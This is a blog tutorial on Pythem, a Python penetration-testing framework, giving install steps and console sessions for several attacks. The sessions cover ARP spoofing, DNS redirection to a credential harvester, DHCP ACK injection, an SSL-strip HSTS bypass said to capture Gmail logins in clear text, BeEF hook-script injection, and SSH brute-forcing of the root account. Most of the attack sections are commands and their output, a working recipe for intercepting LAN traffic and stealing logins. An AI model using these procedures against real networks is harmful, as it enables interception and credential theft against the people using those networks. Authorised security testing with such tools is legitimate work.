Archives

Home Tutorials Pythem – Multi-Purpose Pentest Framework 2017

Pythem – Multi-Purpose Pentest Framework 2017

Tutorials By · July 22, 2017 · Comments off

Pythem is a multi-purpose pentest framework written in Python. It has been developed to be used by security researchers and security professionals. The tool intended to be used only for acts within the law.

Features –

  • Only runs on GNU/Linux OS.
  • Based on Python
  • Easy to install and use

Supported attacks –

  • ARP spoofing – Man-in-the-middle (MITM).
  • Man-in-the-middle HSTS bypass – Strip SSL
  • ARP+DNS spoof – fake page redirect to credential harvester
  • DHCP ACK Injection spoofing – Man-in-the-middle
  • Man-in-the-middle inject BeEF hook
  • SSH Brute-Force attack.
  • Web page formulary brute-force
  • URL content buster
  • Overthrow the DNS of LAN range/IP address
  • Redirect all possible DNS queries to host

This tool is very useful for specially DOS and MITM attacks over LAN network. You can easily define the target, gateway and interface etc

Installation of Pythem –

Installation can be done via git clone by typing this command:

Command: git clone https://github.com/m4n3dw0lf/pythem

Before to run, we have to give full permissions to install executable binary file because we need to install some dependencies which you can easily find from requirements.txt file.

For permissions, the command is “chmod +x install“.

After complete installation, just type “pythem” in your terminal.

To view all commands and information about pythem, just type help in same terminal.

ARP spoofing – Man-in-the-middle

pythem> set interface eth0
pythem> set gateway 192.168.179.2
pythem> arpspoof start
pythem> sniff
[+] Enter the filter: core

ARP+DNS spoof – fake page redirect to credential harvester

pythem> set target 192.168.179.142
pythem> set interface eth0
pythem> set gateway 192.168.179.2
pythem> arpspoof start
[+] Setting the packet forwarding.
[+] Iptables redefined.
[+] ARP spoofing initialized.
pythem> dnsspoof start
[!] Type all to spoof all domains
[+] Domain to be spoofed: example.com
[+] Default address to redirect is:192.168.0.6 do you want to change?[y/n]n
[+] DNS spoofing initialized.
pythem> sniff core

Man-in-the-middle DHCP spoofing – DHCP ACK Injection

pythem> dhcpspoof start
[+] DHCP Server IP address: 192.168.1.1
[+] Broadcast address: 192.168.1.255
[+] Subnet mask: 255.255.255.0
[+] Router IP address: 192.168.1.1
[+] Domain: home
[+] DNS Server IP address: 192.168.1.4 (fake)
[+] DHCP spoofing initialized.
pythem> sniff core

Man-in-the-middle HSTS bypass – Strip SSL

pythem> set interface eth0
pythem> set gateway 192.168.179.2
pythem> set target 192.168.179.142
pythem> hstsbypass
pythem> sniff core

As soon as in target machine when someone login to gmail.com or any other https based site, it will sniff the login credentials in clear text as shown below:

Man-in-the-middle inject BeEF hook

Start BeEF xss framework and get the hook script url

pythem> set interface eth0
pythem> set target 192.168.179.142
pythem> set gateway 192.168.179.2
pythem> arpspoof start
[*] Iptables redefined
[*] Setting the packet forwarding.
[+] ARP spoofing initialized.
pythem> redirect start
[+] Enter the script source: http://192.168.179.145:3000/hook.js
[+] Redirect with script injection initialized.
[+] Injection URL – http://192.168.179.145:80
[+] Target was requesting: waccounts.google.com
[+] Script Injected on: (‘192.168.179.1’, 27813)

SSH Brute-Force attack

pythem> service ssh start
pythem> set target
[+] Enter the target(s): 127.0.0.1
pythem> set file wordlist.txt
pythem> brute ssh
[+] Enter the username to bruteforce: root

Related Posts

Bella Protocol vs. Traditional Banking: A New Era of Financial Services

Tutorials By · September 3, 2023 · Comments off
Bella Protocol
In recent years, the financial landscape has experienced a wave of transformative technologies and decentralized systems that are poised to reshape traditional banking practices. Among these advancements, Bella Protocol has emerged as a game-changing decentralized finance (DeFi) platform, introducing a... Read more

How Does Spam Score Affect SEO?

Tutorials By · July 24, 2023 · Comments off
SEO is vital in maintaining a good spam score for ranking websites on search engines. But how does spam score affect SEO? Building websites means you have to rank on search engines as best quality content. But if your site... Read more

Top Email Marketing Applications for Effective Campaigns

Tutorials By · July 1, 2023 · Comments off
Email Marketing Applications Yeahhub
Email marketing has proven to be a powerful tool for businesses to engage with their customers, drive sales, and build lasting relationships. To optimize your email marketing efforts, it’s essential to choose the right email marketing application. In this article,... Read more

Edit and Compile Code with the Best 5 Code Editors

Tutorials By · June 18, 2023 · Comments off
Code Editors Yeahhub
Code editors play a crucial role in the world of programming by providing developers with a powerful environment to write, edit, and compile their code. With numerous options available, it can be overwhelming to choose the right code editor for... Read more

50+ Top DevSecOps Tools You Need To Know

Tutorials By · June 18, 2023 · Comments off
DevSecOps Tools Yeahhub
DevSecOps, a combination of development, security, and operations, is an approach that emphasizes integrating security practices into every stage of the software development lifecycle. By integrating security early on, DevSecOps helps organizations build robust and secure applications, mitigating risks and... Read more

Learn How to Add Proxy and Multiple Accounts in MoreLogin

Tutorials By · April 25, 2023 · Comments off
Add Proxy and Multiple Accounts in MoreLogin Managing multiple online accounts has become more prevalent, but it can be much work to log in and out of each account repeatedly. Fortunately, MoreLogin offers a practical solution to online security and... Read more

Can Jews and Evangelical Christians Co-Exist?

Tutorials By · March 19, 2023 · Comments off
Jews welcome evangelical Christians’ pro-Israel stance and efforts to form friendly relations with the Jewish community but anti-missionary activists worry that this relationship comes at a price. The fundamentalist Christian denominations have been aggressively targeting Jews for conversion for the... Read more

What Will Be Digital Information Technology in 2023

Tutorials By · January 26, 2023 · Comments off
A gigantic area of designing known as “digital information technology” centers around changing data into information and afterward back once more. Moreover, data and information as photographs, messages, sounds, and recordings are sent utilizing digital information technology. The advancement of... Read more

Advantages Of Using Opkey SAP Testing Services

Tutorials By · November 11, 2022 · Comments off
Automation and technology have taken the world by storm. Everyone uses technology for different operations and to accomplish various tasks. While most apps offer different functions, it is essential to check the status of authenticity, reliability, and level of performance... Read more

5 Windows 10 Features: How to Use Them

Tutorials By · January 25, 2022 · Comments off
Windows 11 is around the corner. Soon, a lot of users will switch toward the new operating system. However, Windows 10 will remain actual and receive updates. Whether you use Windows 10 for research paper writer service or to play... Read more